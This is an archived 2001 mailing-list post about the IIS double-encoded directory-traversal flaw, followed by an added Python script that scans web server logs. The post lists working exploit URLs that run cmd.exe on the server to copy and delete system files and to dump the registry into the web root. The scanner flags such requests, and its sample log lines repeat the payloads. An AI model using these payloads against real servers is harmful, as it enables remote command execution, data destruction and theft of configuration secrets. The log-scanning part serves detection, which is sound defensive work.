I've tried various combinations myself. You can call any valid cmd.exe DOS command.

Example:

Copy:
scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe

Delete:
scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe

Dir with /w:
scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w

Here's a cool one: Dump the registry to a text file and view from web... :)
scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\registry.txt

When executing cmd.exe through IIS, you only have one shot. However, when you are in the DOS Shell, you have the advantage of the Shell to parse your command lines. I.e.:

>dir /w | cmd

You will not be able to mimic this through IIS, due to the absence of the DOS Shell.

My 2 cents.

Harry Steinmeyer
Senior Programmer
Winn-Dixie, Inc.

rm -rf /bin/laden

"Science without religion is lame, religion without science is blind."
Einstein, Albert (1879-1955)
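For defenders reviewing web server logs, the requests quoted in the post above can be found by percent-decoding each URI until it stops changing and then checking the result. This is an added example, not part of the original post; the log layout, sample lines, and the names decode_fully, classify and scan are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: cap on decode passes, enough for nested encodings
TRAVERSAL = re.compile(r"\.\.[\\/]")
SHELL = re.compile(r"\b(cmd|command)\.(exe|com)\b", re.I)

# Constructed sample lines in a simplified "ip method uri status" layout
SAMPLE_LOG = """\
192.0.2.10 GET /default.asp?name=a%20b 200
192.0.2.77 GET /scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w 200
192.0.2.77 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 404
"""

def decode_fully(uri):
    """Percent-decode until the text stops changing; return (text, passes)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri, rounds = decoded, rounds + 1
    return uri, rounds

def classify(uri):
    """Return the list of findings for one request URI (path plus query)."""
    decoded, rounds = decode_fully(uri)
    findings = []
    if rounds > 1:  # %25%35c -> %5c -> \ needs two passes
        findings.append("multi-encoded")
    if TRAVERSAL.search(decoded):
        findings.append("traversal")
    if SHELL.search(decoded):
        findings.append("shell-binary")
    return findings

def scan(log_text):
    """Return (ip, status, findings) for every log line with findings."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the constructed layout
        ip, _method, uri, status = parts
        findings = classify(uri)
        if findings:
            hits.append((ip, status, findings))
    return hits

if __name__ == "__main__":
    for ip, status, findings in scan(SAMPLE_LOG):
        print(ip, status, ",".join(findings))
```

A hit that combines all three findings with a 200 status is the one to triage first, since the server answered the request rather than rejecting it.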
This archive was generated by hypermail 2b30 : Wed Oct 24 2001 - 14:31:50 PDT